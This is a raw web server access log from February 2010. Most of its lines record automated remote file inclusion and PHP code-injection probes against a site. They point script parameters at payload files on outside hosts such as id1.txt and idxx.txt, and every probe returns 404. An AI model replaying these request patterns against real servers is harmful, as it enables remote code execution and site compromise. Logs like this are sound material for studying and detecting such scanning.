202.167.221.65 - - [23/Feb/2010:01:57:02 -0500] "GET /logs//cms/classes/openengine/filepool.php?oe_classpath=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:57:05 -0500] "GET /logs/access_log.Q110020900%20%20//cms/classes/openengine/filepool.php?oe_classpath=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:57:25 -0500] "GET //skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:57:27 -0500] "GET /logs//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:57:27 -0500] "GET /logs/error_log.Q109121000%20%20//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:57:37 -0500] "GET //skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:57:37 -0500] "GET /logs/error_log.Q109121000%20%20//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:57:38 -0500] "GET /logs//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:58:11 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:58:11 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:58:11 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.70.36.57 - - [23/Feb/2010:01:58:55 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
202.70.36.57 - - [23/Feb/2010:01:58:55 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
209.59.12.99 - - [23/Feb/2010:01:59:04 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.167.221.65 - - [23/Feb/2010:01:59:30 -0500] "GET /logs/access_log.Q109111200%20%20//cms/classes/openengine/filepool.php?oe_classpath=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.70.36.57 - - [23/Feb/2010:01:59:33 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
202.70.36.57 - - [23/Feb/2010:01:59:33 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
216.119.103.16 - - [23/Feb/2010:01:59:36 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.119.103.16 - - [23/Feb/2010:01:59:36 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.119.103.16 - - [23/Feb/2010:01:59:36 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:59:36 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:59:36 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:59:53 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.119.103.16 - - [23/Feb/2010:01:59:56 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.119.103.16 - - [23/Feb/2010:01:59:56 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.119.103.16 - - [23/Feb/2010:01:59:56 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:02:00:09 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:02:00:09 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:02:00:09 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:02:00:25 -0500] "GET /logs/access_log.Q109120800%20%20//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:00:25 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:02:00:27 -0500] "GET /logs/access_log.Q109120800%20%20//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:00:28 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:00:30 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:00:42 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:00:42 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:00:44 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:02:01:52 -0500] "GET /logs/access_log.Q109062400///index2.php?page=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:02:02:01 -0500] "GET /logs/error_log.Q109082500 HTTP/1.0" 200 3935237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.186 - - [23/Feb/2010:02:02:37 -0500] "GET /logs/error_log.Q109082500 HTTP/1.0" 200 3935237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.86.155.18 - - [23/Feb/2010:02:04:19 -0500] "GET /logs/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:02:04:19 -0500] "GET /error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:02:04:19 -0500] "GET /logs/access_log.Q110020800%20%20/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:02:04:19 -0500] "GET /logs/access_log.Q109070800%20%20/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:04:19 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:04:19 -0500] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:04:19 -0500] "GET /logs/access_log.Q109062800%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:04:19 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:02:04:33 -0500] "GET /logs/error_log.Q109051300///index2.php?page=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:02:04:33 -0500] "GET /logs/error_log.Q109121900///index2.php?page=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.225.23.41 - - [23/Feb/2010:02:04:34 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
69.225.23.41 - - [23/Feb/2010:02:04:34 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
69.225.23.41 - - [23/Feb/2010:02:04:37 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
69.225.23.41 - - [23/Feb/2010:02:04:37 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"
80.23.181.2 - - [23/Feb/2010:02:04:47 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:04:47 -0500] "GET /logs/access_log.Q109081000%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:04:50 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:05:07 -0500] "GET /logs/access_log.Q109122700%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:05:19 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:02:05:19 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
209.59.12.99 - - [23/Feb/2010:02:07:07 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.51.24.102 - - [23/Feb/2010:02:07:21 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
210.51.24.102 - - [23/Feb/2010:02:07:21 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
210.51.24.102 - - [23/Feb/2010:02:07:21 -0500] "GET /logs/access_log.Q109081000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
80.23.181.2 - - [23/Feb/2010:02:07:28 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:07:28 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:07:28 -0500] "GET /logs/access_log.Q109081000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:07:45 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:07:45 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:07:45 -0500] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.51.24.102 - - [23/Feb/2010:02:08:10 -0500] "GET /logs/access_log.Q109122700/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
216.119.103.16 - - [23/Feb/2010:02:08:41 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:09:41 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:09:41 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:09:41 -0500] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.119.103.16 - - [23/Feb/2010:02:09:42 -0500] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:09:44 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:09:44 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:09:44 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:09:49 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:09:49 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:09:49 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:10:22 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:10:22 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:10:22 -0500] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:02:10:22 -0500] "GET /logs/access_log.Q109062800//modules/vwar/admin/admin.php?vwar_root=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:02:10:33 -0500] "GET /logs/access_log.Q109121000//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:02:11:00 -0500] "GET /logs/access_log.Q109121000//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:02:11:29 -0500] "GET /logs/error_log.Q109121000//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:11:41 -0500] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:02:12:04 -0500] "GET /logs/error_log.Q109121000//skin/happycast_estimate/ask_password.php?dir=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:12:10 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:12:10 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:12:10 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:12:53 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:12:53 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:12:53 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:14:47 -0500] "GET //bbs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:14:47 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:14:47 -0500] "GET /logs/access_log.Q110020500%20%20//bbs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:15:11 -0500] "GET //main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:15:11 -0500] "GET /logs/access_log.Q109121400%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:15:11 -0500] "GET /logs//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:15:21 -0500] "GET //main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:15:21 -0500] "GET /logs//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:15:21 -0500] "GET /logs/access_log.Q109121400%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:15:26 -0500] "GET //main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:15:26 -0500] "GET /logs//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:15:28 -0500] "GET /logs/access_log.Q109121400%20%20//main.php?sayfa=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:15:32 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:02:15:33 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:02:15:58 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.254.98.142 - - [23/Feb/2010:02:15:58 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.143.29.250 - - [23/Feb/2010:02:16:28 -0500] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:02:16:30 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.29.250 - - [23/Feb/2010:02:16:32 -0500] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:02:17:05 -0500] "GET /logs/access_log.Q109070800/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:02:17:05 -0500] "GET /logs/access_log.Q110020800/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:17:17 -0500] "GET /index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:17:17 -0500] "GET /logs/index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:17:19 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:17:19 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:17:19 -0500] "GET /logs/access_log.Q110020500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:17:19 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:02:17:19 -0500] "GET /images/_notes/download_osteotomes.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [23/Feb/2010:02:17:21 -0500] "GET /index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:17:22 -0500] "GET /logs/index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
